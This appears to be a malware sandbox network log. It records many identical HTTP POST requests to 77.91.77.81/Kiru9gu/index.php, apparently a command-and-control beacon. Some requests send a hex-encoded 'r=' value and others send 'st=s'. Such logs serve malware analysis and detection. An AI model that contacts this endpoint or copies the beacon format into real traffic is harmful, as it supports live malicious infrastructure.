Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
